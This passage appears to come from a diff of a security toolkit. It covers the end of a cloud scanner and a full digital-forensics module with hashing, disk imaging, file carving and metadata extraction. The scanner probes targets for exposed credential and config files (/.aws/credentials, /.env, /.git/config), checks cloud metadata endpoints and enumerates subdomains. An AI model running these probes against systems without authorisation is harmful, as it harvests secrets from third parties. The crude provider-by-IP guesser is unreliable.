if resp.status_code == 200:
|
||||
found.append({
|
||||
'account': account, 'container': container,
|
||||
'provider': 'azure', 'url': url,
|
||||
'status': resp.status_code, 'public': True
|
||||
})
|
||||
elif resp.status_code == 403:
|
||||
found.append({
|
||||
'account': account, 'container': container,
|
||||
'provider': 'azure', 'url': url,
|
||||
'status': 403, 'exists': True, 'public': False
|
||||
})
|
||||
except Exception:
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
self._jobs[job_id]['found'] = found
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
|
||||
threading.Thread(target=_enum, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
# ── Exposed Services ─────────────────────────────────────────────────
|
||||
|
||||
def scan_exposed_services(self, target: str) -> Dict:
|
||||
"""Check for commonly exposed cloud services on a target."""
|
||||
if not HAS_REQUESTS:
|
||||
return {'ok': False, 'error': 'requests not available'}
|
||||
|
||||
services = []
|
||||
checks = [
|
||||
('/server-status', 'Apache Status'),
|
||||
('/nginx_status', 'Nginx Status'),
|
||||
('/.env', 'Environment File'),
|
||||
('/.git/config', 'Git Config'),
|
||||
('/.aws/credentials', 'AWS Credentials'),
|
||||
('/wp-config.php.bak', 'WordPress Config Backup'),
|
||||
('/phpinfo.php', 'PHP Info'),
|
||||
('/debug', 'Debug Endpoint'),
|
||||
('/actuator', 'Spring Actuator'),
|
||||
('/actuator/env', 'Spring Env'),
|
||||
('/api/swagger.json', 'Swagger/OpenAPI Spec'),
|
||||
('/.well-known/security.txt', 'Security Policy'),
|
||||
('/robots.txt', 'Robots.txt'),
|
||||
('/sitemap.xml', 'Sitemap'),
|
||||
('/graphql', 'GraphQL Endpoint'),
|
||||
('/console', 'Console'),
|
||||
('/admin', 'Admin Panel'),
|
||||
('/wp-admin', 'WordPress Admin'),
|
||||
('/phpmyadmin', 'phpMyAdmin'),
|
||||
]
|
||||
|
||||
for path, name in checks:
|
||||
try:
|
||||
url = f'{target.rstrip("/")}{path}'
|
||||
resp = requests.get(url, timeout=5, allow_redirects=False)
|
||||
if resp.status_code == 200:
|
||||
# Check content for sensitive data
|
||||
sensitive = False
|
||||
body = resp.text[:2000].lower()
|
||||
sensitive_indicators = [
|
||||
'password', 'secret', 'access_key', 'private_key',
|
||||
'database', 'db_host', 'smtp_pass', 'api_key'
|
||||
]
|
||||
if any(ind in body for ind in sensitive_indicators):
|
||||
sensitive = True
|
||||
|
||||
services.append({
|
||||
'path': path, 'name': name,
|
||||
'url': url, 'status': resp.status_code,
|
||||
'size': len(resp.content),
|
||||
'sensitive': sensitive,
|
||||
'content_type': resp.headers.get('content-type', '')
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'target': target,
|
||||
'services': services,
|
||||
'count': len(services)
|
||||
}
|
||||
|
||||
# ── Metadata SSRF Check ──────────────────────────────────────────────
|
||||
|
||||
def check_metadata_access(self) -> Dict:
|
||||
"""Check if cloud metadata service is accessible (SSRF indicator)."""
|
||||
results = {}
|
||||
for provider, url in METADATA_ENDPOINTS.items():
|
||||
try:
|
||||
headers = {}
|
||||
if provider == 'gcp':
|
||||
headers['Metadata-Flavor'] = 'Google'
|
||||
|
||||
resp = requests.get(url, headers=headers, timeout=3)
|
||||
results[provider] = {
|
||||
'accessible': resp.status_code == 200,
|
||||
'status': resp.status_code,
|
||||
'content_preview': resp.text[:200] if resp.status_code == 200 else ''
|
||||
}
|
||||
except Exception:
|
||||
results[provider] = {'accessible': False, 'error': 'Connection failed'}
|
||||
|
||||
return {'ok': True, 'metadata': results}
|
||||
|
||||
# ── Subdomain / DNS Enumeration for Cloud ────────────────────────────
|
||||
|
||||
def enum_cloud_subdomains(self, domain: str) -> Dict:
|
||||
"""Check for cloud-specific subdomains."""
|
||||
if not HAS_REQUESTS:
|
||||
return {'ok': False, 'error': 'requests not available'}
|
||||
|
||||
cloud_prefixes = [
|
||||
'aws', 's3', 'ec2', 'lambda', 'api', 'cdn',
|
||||
'azure', 'blob', 'cloud', 'gcp', 'storage',
|
||||
'dev', 'staging', 'prod', 'admin', 'internal',
|
||||
'vpn', 'mail', 'smtp', 'imap', 'ftp', 'ssh',
|
||||
'db', 'database', 'redis', 'elastic', 'kibana',
|
||||
'grafana', 'prometheus', 'jenkins', 'gitlab', 'docker',
|
||||
'k8s', 'kubernetes', 'consul', 'vault', 'traefik',
|
||||
]
|
||||
|
||||
found = []
|
||||
import socket
|
||||
for prefix in cloud_prefixes:
|
||||
subdomain = f'{prefix}.{domain}'
|
||||
try:
|
||||
ip = socket.gethostbyname(subdomain)
|
||||
found.append({
|
||||
'subdomain': subdomain,
|
||||
'ip': ip,
|
||||
'cloud_hint': self._identify_cloud_ip(ip)
|
||||
})
|
||||
except socket.gaierror:
|
||||
pass
|
||||
|
||||
return {'ok': True, 'domain': domain, 'subdomains': found, 'count': len(found)}
|
||||
|
||||
def _identify_cloud_ip(self, ip: str) -> str:
|
||||
"""Try to identify cloud provider from IP."""
|
||||
# Rough range checks
|
||||
octets = ip.split('.')
|
||||
if len(octets) == 4:
|
||||
first = int(octets[0])
|
||||
if first in (3, 18, 52, 54, 35):
|
||||
return 'AWS'
|
||||
elif first in (20, 40, 52, 104, 13):
|
||||
return 'Azure'
|
||||
elif first in (34, 35, 104, 142):
|
||||
return 'GCP'
|
||||
return 'Unknown'
|
||||
|
||||
# ── Job Management ───────────────────────────────────────────────────
|
||||
|
||||
def get_job(self, job_id: str) -> Optional[Dict]:
|
||||
return self._jobs.get(job_id)
|
||||
|
||||
def list_jobs(self) -> List[Dict]:
|
||||
return [{'id': k, **v} for k, v in self._jobs.items()]
|
||||
|
||||
# ── Save Results ─────────────────────────────────────────────────────
|
||||
|
||||
def save_results(self, name: str, results: Dict) -> Dict:
|
||||
"""Save scan results."""
|
||||
filepath = os.path.join(self.data_dir, f'{name}.json')
|
||||
with open(filepath, 'w') as f:
|
||||
json.dump(results, f, indent=2)
|
||||
return {'ok': True, 'path': filepath}
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_cloud_scanner() -> CloudScanner:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = CloudScanner()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for Cloud Security module."""
|
||||
if not HAS_REQUESTS:
|
||||
print(" Error: requests library required")
|
||||
return
|
||||
|
||||
scanner = get_cloud_scanner()
|
||||
|
||||
while True:
|
||||
print(f"\n{'='*60}")
|
||||
print(f" Cloud Security Scanner")
|
||||
print(f"{'='*60}")
|
||||
print()
|
||||
print(" 1 — Enumerate S3 Buckets (AWS)")
|
||||
print(" 2 — Enumerate GCS Buckets (Google)")
|
||||
print(" 3 — Enumerate Azure Blobs")
|
||||
print(" 4 — Scan Exposed Services")
|
||||
print(" 5 — Check Metadata Access (SSRF)")
|
||||
print(" 6 — Cloud Subdomain Enum")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
kw = input(" Target keyword: ").strip()
|
||||
if kw:
|
||||
job_id = scanner.enum_s3_buckets(kw)
|
||||
print(f" Scanning... (job: {job_id})")
|
||||
while True:
|
||||
job = scanner.get_job(job_id)
|
||||
if job['status'] == 'complete':
|
||||
for b in job['found']:
|
||||
status = 'PUBLIC+LISTABLE' if b.get('listable') else \
|
||||
('PUBLIC' if b.get('public') else 'EXISTS')
|
||||
print(f" [{status}] {b['bucket']}")
|
||||
if not job['found']:
|
||||
print(" No buckets found")
|
||||
break
|
||||
time.sleep(1)
|
||||
elif choice == '4':
|
||||
target = input(" Target URL: ").strip()
|
||||
if target:
|
||||
result = scanner.scan_exposed_services(target)
|
||||
for s in result['services']:
|
||||
flag = ' [SENSITIVE]' if s.get('sensitive') else ''
|
||||
print(f" {s['path']}: {s['name']}{flag}")
|
||||
elif choice == '5':
|
||||
result = scanner.check_metadata_access()
|
||||
for provider, info in result['metadata'].items():
|
||||
status = 'ACCESSIBLE' if info.get('accessible') else 'blocked'
|
||||
print(f" {provider}: {status}")
|
||||
elif choice == '6':
|
||||
domain = input(" Target domain: ").strip()
|
||||
if domain:
|
||||
result = scanner.enum_cloud_subdomains(domain)
|
||||
for s in result['subdomains']:
|
||||
print(f" {s['subdomain']} → {s['ip']} ({s['cloud_hint']})")
|
||||
595
modules/forensics.py
Normal file
595
modules/forensics.py
Normal file
@ -0,0 +1,595 @@
|
||||
"""AUTARCH Forensics Toolkit
|
||||
|
||||
Disk imaging, file carving, metadata extraction, timeline building,
|
||||
hash verification, and chain of custody logging for digital forensics.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Digital forensics & evidence analysis"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "analyze"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import hashlib
|
||||
import struct
|
||||
import shutil
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any, Tuple
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
# Optional imports
|
||||
try:
|
||||
from PIL import Image as PILImage
|
||||
from PIL.ExifTags import TAGS, GPSTAGS
|
||||
HAS_PIL = True
|
||||
except ImportError:
|
||||
HAS_PIL = False
|
||||
|
||||
|
||||
# ── File Signatures for Carving ──────────────────────────────────────────────
|
||||
|
||||
FILE_SIGNATURES = [
|
||||
{'name': 'JPEG', 'ext': '.jpg', 'magic': b'\xFF\xD8\xFF', 'footer': b'\xFF\xD9', 'max_size': 50*1024*1024},
|
||||
{'name': 'PNG', 'ext': '.png', 'magic': b'\x89PNG\r\n\x1a\n', 'footer': b'IEND\xAE\x42\x60\x82', 'max_size': 50*1024*1024},
|
||||
{'name': 'GIF', 'ext': '.gif', 'magic': b'GIF8', 'footer': b'\x00\x3B', 'max_size': 20*1024*1024},
|
||||
{'name': 'PDF', 'ext': '.pdf', 'magic': b'%PDF', 'footer': b'%%EOF', 'max_size': 100*1024*1024},
|
||||
{'name': 'ZIP', 'ext': '.zip', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 500*1024*1024},
|
||||
{'name': 'RAR', 'ext': '.rar', 'magic': b'Rar!\x1a\x07', 'footer': None, 'max_size': 500*1024*1024},
|
||||
{'name': 'ELF', 'ext': '.elf', 'magic': b'\x7fELF', 'footer': None, 'max_size': 100*1024*1024},
|
||||
{'name': 'PE/EXE', 'ext': '.exe', 'magic': b'MZ', 'footer': None, 'max_size': 100*1024*1024},
|
||||
{'name': 'SQLite', 'ext': '.sqlite', 'magic': b'SQLite format 3\x00', 'footer': None, 'max_size': 500*1024*1024},
|
||||
{'name': 'DOCX', 'ext': '.docx', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 100*1024*1024},
|
||||
{'name': '7z', 'ext': '.7z', 'magic': b"7z\xBC\xAF'\x1C", 'footer': None, 'max_size': 500*1024*1024},
|
||||
{'name': 'BMP', 'ext': '.bmp', 'magic': b'BM', 'footer': None, 'max_size': 50*1024*1024},
|
||||
{'name': 'MP3', 'ext': '.mp3', 'magic': b'\xFF\xFB', 'footer': None, 'max_size': 50*1024*1024},
|
||||
{'name': 'MP4', 'ext': '.mp4', 'magic': b'\x00\x00\x00\x18ftyp', 'footer': None, 'max_size': 1024*1024*1024},
|
||||
{'name': 'AVI', 'ext': '.avi', 'magic': b'RIFF', 'footer': None, 'max_size': 1024*1024*1024},
|
||||
]
|
||||
|
||||
|
||||
# ── Chain of Custody Logger ──────────────────────────────────────────────────
|
||||
|
||||
class CustodyLog:
|
||||
"""Chain of custody logging for forensic evidence."""
|
||||
|
||||
def __init__(self, data_dir: str):
|
||||
self.log_file = os.path.join(data_dir, 'custody_log.json')
|
||||
self.entries: List[Dict] = []
|
||||
self._load()
|
||||
|
||||
def _load(self):
|
||||
if os.path.exists(self.log_file):
|
||||
try:
|
||||
with open(self.log_file) as f:
|
||||
self.entries = json.load(f)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def _save(self):
|
||||
with open(self.log_file, 'w') as f:
|
||||
json.dump(self.entries, f, indent=2)
|
||||
|
||||
def log(self, action: str, target: str, details: str = "",
|
||||
evidence_hash: str = "") -> Dict:
|
||||
"""Log a forensic action."""
|
||||
entry = {
|
||||
'id': len(self.entries) + 1,
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'action': action,
|
||||
'target': target,
|
||||
'details': details,
|
||||
'evidence_hash': evidence_hash,
|
||||
'user': os.getenv('USER', os.getenv('USERNAME', 'unknown'))
|
||||
}
|
||||
self.entries.append(entry)
|
||||
self._save()
|
||||
return entry
|
||||
|
||||
def get_log(self) -> List[Dict]:
|
||||
return self.entries
|
||||
|
||||
|
||||
# ── Forensics Engine ─────────────────────────────────────────────────────────
|
||||
|
||||
class ForensicsEngine:
|
||||
"""Digital forensics toolkit."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'forensics')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.evidence_dir = os.path.join(self.data_dir, 'evidence')
|
||||
os.makedirs(self.evidence_dir, exist_ok=True)
|
||||
self.carved_dir = os.path.join(self.data_dir, 'carved')
|
||||
os.makedirs(self.carved_dir, exist_ok=True)
|
||||
self.custody = CustodyLog(self.data_dir)
|
||||
self.dd = find_tool('dd') or shutil.which('dd')
|
||||
|
||||
# ── Hash Verification ────────────────────────────────────────────────
|
||||
|
||||
def hash_file(self, filepath: str, algorithms: List[str] = None) -> Dict:
|
||||
"""Calculate file hashes for evidence integrity."""
|
||||
algorithms = algorithms or ['md5', 'sha1', 'sha256']
|
||||
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
try:
|
||||
hashers = {alg: hashlib.new(alg) for alg in algorithms}
|
||||
file_size = os.path.getsize(filepath)
|
||||
|
||||
with open(filepath, 'rb') as f:
|
||||
while True:
|
||||
chunk = f.read(8192)
|
||||
if not chunk:
|
||||
break
|
||||
for h in hashers.values():
|
||||
h.update(chunk)
|
||||
|
||||
hashes = {alg: h.hexdigest() for alg, h in hashers.items()}
|
||||
|
||||
self.custody.log('hash_verify', filepath,
|
||||
f'Hashes: {", ".join(f"{k}={v[:16]}..." for k, v in hashes.items())}',
|
||||
hashes.get('sha256', ''))
|
||||
|
||||
return {
|
||||
'ok': True, 'file': filepath,
|
||||
'size': file_size, 'hashes': hashes
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def verify_hash(self, filepath: str, expected_hash: str,
|
||||
algorithm: str = None) -> Dict:
|
||||
"""Verify file against expected hash."""
|
||||
# Auto-detect algorithm from hash length
|
||||
if not algorithm:
|
||||
hash_len = len(expected_hash)
|
||||
algorithm = {32: 'md5', 40: 'sha1', 64: 'sha256', 128: 'sha512'}.get(hash_len)
|
||||
if not algorithm:
|
||||
return {'ok': False, 'error': f'Cannot detect algorithm for hash length {hash_len}'}
|
||||
|
||||
result = self.hash_file(filepath, [algorithm])
|
||||
if not result['ok']:
|
||||
return result
|
||||
|
||||
actual = result['hashes'][algorithm]
|
||||
match = actual.lower() == expected_hash.lower()
|
||||
|
||||
self.custody.log('hash_verify', filepath,
|
||||
f'Expected: {expected_hash[:16]}... Match: {match}')
|
||||
|
||||
return {
|
||||
'ok': True, 'match': match,
|
||||
'algorithm': algorithm,
|
||||
'expected': expected_hash,
|
||||
'actual': actual,
|
||||
'file': filepath
|
||||
}
|
||||
|
||||
# ── Disk Imaging ─────────────────────────────────────────────────────
|
||||
|
||||
def create_image(self, source: str, output: str = None,
|
||||
block_size: int = 4096) -> Dict:
|
||||
"""Create forensic disk image using dd."""
|
||||
if not self.dd:
|
||||
return {'ok': False, 'error': 'dd not found'}
|
||||
|
||||
if not output:
|
||||
name = Path(source).name.replace('/', '_')
|
||||
output = os.path.join(self.evidence_dir, f'{name}_{int(time.time())}.img')
|
||||
|
||||
self.custody.log('disk_image', source, f'Creating image: {output}')
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[self.dd, f'if={source}', f'of={output}', f'bs={block_size}',
|
||||
'conv=noerror,sync', 'status=progress'],
|
||||
capture_output=True, text=True, timeout=3600
|
||||
)
|
||||
|
||||
if os.path.exists(output):
|
||||
# Hash the image
|
||||
hashes = self.hash_file(output, ['md5', 'sha256'])
|
||||
|
||||
self.custody.log('disk_image_complete', output,
|
||||
f'Image created, SHA256: {hashes.get("hashes", {}).get("sha256", "?")}')
|
||||
|
||||
return {
|
||||
'ok': True, 'source': source, 'output': output,
|
||||
'size': os.path.getsize(output),
|
||||
'hashes': hashes.get('hashes', {}),
|
||||
'dd_output': result.stderr
|
||||
}
|
||||
return {'ok': False, 'error': 'Image file not created', 'stderr': result.stderr}
|
||||
|
||||
except subprocess.TimeoutExpired:
|
||||
return {'ok': False, 'error': 'Imaging timed out (1hr limit)'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── File Carving ─────────────────────────────────────────────────────
|
||||
|
||||
def carve_files(self, source: str, file_types: List[str] = None,
|
||||
max_files: int = 100) -> Dict:
|
||||
"""Recover files from raw data by magic byte signatures."""
|
||||
if not os.path.exists(source):
|
||||
return {'ok': False, 'error': 'Source file not found'}
|
||||
|
||||
self.custody.log('file_carving', source, f'Starting carve, types={file_types}')
|
||||
|
||||
# Filter signatures
|
||||
sigs = FILE_SIGNATURES
|
||||
if file_types:
|
||||
type_set = {t.lower() for t in file_types}
|
||||
sigs = [s for s in sigs if s['name'].lower() in type_set or
|
||||
s['ext'].lstrip('.').lower() in type_set]
|
||||
|
||||
carved = []
|
||||
file_size = os.path.getsize(source)
|
||||
chunk_size = 1024 * 1024 # 1MB chunks
|
||||
|
||||
try:
|
||||
with open(source, 'rb') as f:
|
||||
offset = 0
|
||||
while offset < file_size and len(carved) < max_files:
|
||||
f.seek(offset)
|
||||
chunk = f.read(chunk_size)
|
||||
if not chunk:
|
||||
break
|
||||
|
||||
for sig in sigs:
|
||||
pos = 0
|
||||
while pos < len(chunk) and len(carved) < max_files:
|
||||
idx = chunk.find(sig['magic'], pos)
|
||||
if idx == -1:
|
||||
break
|
||||
|
||||
abs_offset = offset + idx
|
||||
# Try to find file end
|
||||
file_end = abs_offset + sig['max_size']
|
||||
if sig['footer']:
|
||||
f.seek(abs_offset)
|
||||
search_data = f.read(min(sig['max_size'], file_size - abs_offset))
|
||||
footer_pos = search_data.find(sig['footer'], len(sig['magic']))
|
||||
if footer_pos != -1:
|
||||
file_end = abs_offset + footer_pos + len(sig['footer'])
|
||||
|
||||
# Extract file
|
||||
extract_size = min(file_end - abs_offset, sig['max_size'])
|
||||
f.seek(abs_offset)
|
||||
file_data = f.read(extract_size)
|
||||
|
||||
# Save carved file
|
||||
carved_name = f'carved_{len(carved):04d}_{sig["name"]}{sig["ext"]}'
|
||||
carved_path = os.path.join(self.carved_dir, carved_name)
|
||||
with open(carved_path, 'wb') as cf:
|
||||
cf.write(file_data)
|
||||
|
||||
file_hash = hashlib.md5(file_data).hexdigest()
|
||||
carved.append({
|
||||
'name': carved_name,
|
||||
'path': carved_path,
|
||||
'type': sig['name'],
|
||||
'offset': abs_offset,
|
||||
'size': len(file_data),
|
||||
'md5': file_hash
|
||||
})
|
||||
|
||||
pos = idx + len(sig['magic'])
|
||||
|
||||
offset += chunk_size - max(len(s['magic']) for s in sigs)
|
||||
|
||||
self.custody.log('file_carving_complete', source,
|
||||
f'Carved {len(carved)} files')
|
||||
|
||||
return {
|
||||
'ok': True, 'source': source,
|
||||
'carved': carved, 'count': len(carved),
|
||||
'output_dir': self.carved_dir
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Metadata Extraction ──────────────────────────────────────────────
|
||||
|
||||
def extract_metadata(self, filepath: str) -> Dict:
|
||||
"""Extract metadata from files (EXIF, PDF, Office, etc.)."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
ext = Path(filepath).suffix.lower()
|
||||
metadata = {
|
||||
'file': filepath,
|
||||
'name': Path(filepath).name,
|
||||
'size': os.path.getsize(filepath),
|
||||
'created': datetime.fromtimestamp(os.path.getctime(filepath), timezone.utc).isoformat(),
|
||||
'modified': datetime.fromtimestamp(os.path.getmtime(filepath), timezone.utc).isoformat(),
|
||||
'accessed': datetime.fromtimestamp(os.path.getatime(filepath), timezone.utc).isoformat(),
|
||||
}
|
||||
|
||||
# EXIF for images
|
||||
if ext in ('.jpg', '.jpeg', '.tiff', '.tif', '.png') and HAS_PIL:
|
||||
try:
|
||||
img = PILImage.open(filepath)
|
||||
metadata['image'] = {
|
||||
'width': img.size[0], 'height': img.size[1],
|
||||
'format': img.format, 'mode': img.mode
|
||||
}
|
||||
exif = img._getexif()
|
||||
if exif:
|
||||
exif_data = {}
|
||||
gps_data = {}
|
||||
for tag_id, value in exif.items():
|
||||
tag = TAGS.get(tag_id, tag_id)
|
||||
if tag == 'GPSInfo':
|
||||
for gps_id, gps_val in value.items():
|
||||
gps_tag = GPSTAGS.get(gps_id, gps_id)
|
||||
gps_data[str(gps_tag)] = str(gps_val)
|
||||
else:
|
||||
# Convert bytes to string for JSON serialization
|
||||
if isinstance(value, bytes):
|
||||
try:
|
||||
value = value.decode('utf-8', errors='replace')
|
||||
except Exception:
|
||||
value = value.hex()
|
||||
exif_data[str(tag)] = str(value)
|
||||
metadata['exif'] = exif_data
|
||||
if gps_data:
|
||||
metadata['gps'] = gps_data
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# PDF metadata
|
||||
elif ext == '.pdf':
|
||||
try:
|
||||
with open(filepath, 'rb') as f:
|
||||
content = f.read(4096)
|
||||
# Extract info dict
|
||||
for key in [b'/Title', b'/Author', b'/Subject', b'/Creator',
|
||||
b'/Producer', b'/CreationDate', b'/ModDate']:
|
||||
pattern = key + rb'\s*\(([^)]*)\)'
|
||||
m = re.search(pattern, content)
|
||||
if m:
|
||||
k = key.decode().lstrip('/')
|
||||
metadata.setdefault('pdf', {})[k] = m.group(1).decode('utf-8', errors='replace')
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Generic file header
|
||||
try:
|
||||
with open(filepath, 'rb') as f:
|
||||
header = f.read(16)
|
||||
metadata['magic_bytes'] = header.hex()
|
||||
for sig in FILE_SIGNATURES:
|
||||
if header.startswith(sig['magic']):
|
||||
metadata['detected_type'] = sig['name']
|
||||
break
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
self.custody.log('metadata_extract', filepath, f'Type: {metadata.get("detected_type", "unknown")}')
|
||||
|
||||
return {'ok': True, **metadata}
|
||||
|
||||
# ── Timeline Builder ─────────────────────────────────────────────────
|
||||
|
||||
def build_timeline(self, directory: str, recursive: bool = True,
|
||||
max_entries: int = 10000) -> Dict:
|
||||
"""Build filesystem timeline from directory metadata."""
|
||||
if not os.path.exists(directory):
|
||||
return {'ok': False, 'error': 'Directory not found'}
|
||||
|
||||
events = []
|
||||
count = 0
|
||||
|
||||
walk_fn = os.walk if recursive else lambda d: [(d, [], os.listdir(d))]
|
||||
for root, dirs, files in walk_fn(directory):
|
||||
for name in files:
|
||||
if count >= max_entries:
|
||||
break
|
||||
filepath = os.path.join(root, name)
|
||||
try:
|
||||
stat = os.stat(filepath)
|
||||
events.append({
|
||||
'type': 'modified',
|
||||
'timestamp': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
|
||||
'epoch': stat.st_mtime,
|
||||
'file': filepath,
|
||||
'size': stat.st_size
|
||||
})
|
||||
events.append({
|
||||
'type': 'created',
|
||||
'timestamp': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(),
|
||||
'epoch': stat.st_ctime,
|
||||
'file': filepath,
|
||||
'size': stat.st_size
|
||||
})
|
||||
events.append({
|
||||
'type': 'accessed',
|
||||
'timestamp': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(),
|
||||
'epoch': stat.st_atime,
|
||||
'file': filepath,
|
||||
'size': stat.st_size
|
||||
})
|
||||
count += 1
|
||||
except (OSError, PermissionError):
|
||||
pass
|
||||
|
||||
# Sort by timestamp
|
||||
events.sort(key=lambda e: e['epoch'])
|
||||
|
||||
self.custody.log('timeline_build', directory,
|
||||
f'{count} files, {len(events)} events')
|
||||
|
||||
return {
|
||||
'ok': True, 'directory': directory,
|
||||
'events': events, 'event_count': len(events),
|
||||
'file_count': count
|
||||
}
|
||||
|
||||
# ── Evidence Management ──────────────────────────────────────────────
|
||||
|
||||
def list_evidence(self) -> List[Dict]:
|
||||
"""List evidence files."""
|
||||
evidence = []
|
||||
edir = Path(self.evidence_dir)
|
||||
for f in sorted(edir.iterdir()):
|
||||
if f.is_file():
|
||||
evidence.append({
|
||||
'name': f.name,
|
||||
'path': str(f),
|
||||
'size': f.stat().st_size,
|
||||
'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
|
||||
})
|
||||
return evidence
|
||||
|
||||
def list_carved(self) -> List[Dict]:
|
||||
"""List carved files."""
|
||||
carved = []
|
||||
cdir = Path(self.carved_dir)
|
||||
for f in sorted(cdir.iterdir()):
|
||||
if f.is_file():
|
||||
carved.append({
|
||||
'name': f.name,
|
||||
'path': str(f),
|
||||
'size': f.stat().st_size
|
||||
})
|
||||
return carved
|
||||
|
||||
def get_custody_log(self) -> List[Dict]:
|
||||
"""Get chain of custody log."""
|
||||
return self.custody.get_log()
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_forensics() -> ForensicsEngine:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = ForensicsEngine()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for Forensics module."""
|
||||
engine = get_forensics()
|
||||
|
||||
while True:
|
||||
print(f"\n{'='*60}")
|
||||
print(f" Digital Forensics Toolkit")
|
||||
print(f"{'='*60}")
|
||||
print()
|
||||
print(" 1 — Hash File (integrity verification)")
|
||||
print(" 2 — Verify Hash")
|
||||
print(" 3 — Create Disk Image")
|
||||
print(" 4 — Carve Files (recover deleted)")
|
||||
print(" 5 — Extract Metadata (EXIF/PDF/headers)")
|
||||
print(" 6 — Build Timeline")
|
||||
print(" 7 — List Evidence")
|
||||
print(" 8 — List Carved Files")
|
||||
print(" 9 — Chain of Custody Log")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
filepath = input(" File path: ").strip()
|
||||
if filepath:
|
||||
result = engine.hash_file(filepath)
|
||||
if result['ok']:
|
||||
print(f" Size: {result['size']} bytes")
|
||||
for alg, h in result['hashes'].items():
|
||||
print(f" {alg.upper()}: {h}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '2':
|
||||
filepath = input(" File path: ").strip()
|
||||
expected = input(" Expected hash: ").strip()
|
||||
if filepath and expected:
|
||||
result = engine.verify_hash(filepath, expected)
|
||||
if result['ok']:
|
||||
status = 'MATCH' if result['match'] else 'MISMATCH'
|
||||
print(f" {status} ({result['algorithm'].upper()})")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '3':
|
||||
source = input(" Source device/file: ").strip()
|
||||
output = input(" Output path (blank=auto): ").strip() or None
|
||||
if source:
|
||||
result = engine.create_image(source, output)
|
||||
if result['ok']:
|
||||
mb = result['size'] / (1024*1024)
|
||||
print(f" Image created: {result['output']} ({mb:.1f} MB)")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '4':
|
||||
source = input(" Source file/image: ").strip()
|
||||
types = input(" File types (blank=all, comma-sep): ").strip()
|
||||
if source:
|
||||
file_types = [t.strip() for t in types.split(',')] if types else None
|
||||
result = engine.carve_files(source, file_types)
|
||||
if result['ok']:
|
||||
print(f" Carved {result['count']} files to {result['output_dir']}")
|
||||
for c in result['carved'][:10]:
|
||||
print(f" {c['name']} {c['type']} {c['size']} bytes offset={c['offset']}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '5':
|
||||
filepath = input(" File path: ").strip()
|
||||
if filepath:
|
||||
result = engine.extract_metadata(filepath)
|
||||
if result['ok']:
|
||||
print(f" Name: {result['name']}")
|
||||
print(f" Size: {result['size']}")
|
||||
print(f" Type: {result.get('detected_type', 'unknown')}")
|
||||
if 'exif' in result:
|
||||
print(f" EXIF entries: {len(result['exif'])}")
|
||||
for k, v in list(result['exif'].items())[:5]:
|
||||
print(f" {k}: {v[:50]}")
|
||||
if 'gps' in result:
|
||||
print(f" GPS data: {result['gps']}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '6':
|
||||
directory = input(" Directory path: ").strip()
|
||||
if directory:
|
||||
result = engine.build_timeline(directory)
|
||||
if result['ok']:
|
||||
print(f" {result['file_count']} files, {result['event_count']} events")
|
||||
for e in result['events'][:10]:
|
||||
print(f" {e['timestamp']} {e['type']:<10} {Path(e['file']).name}")
|
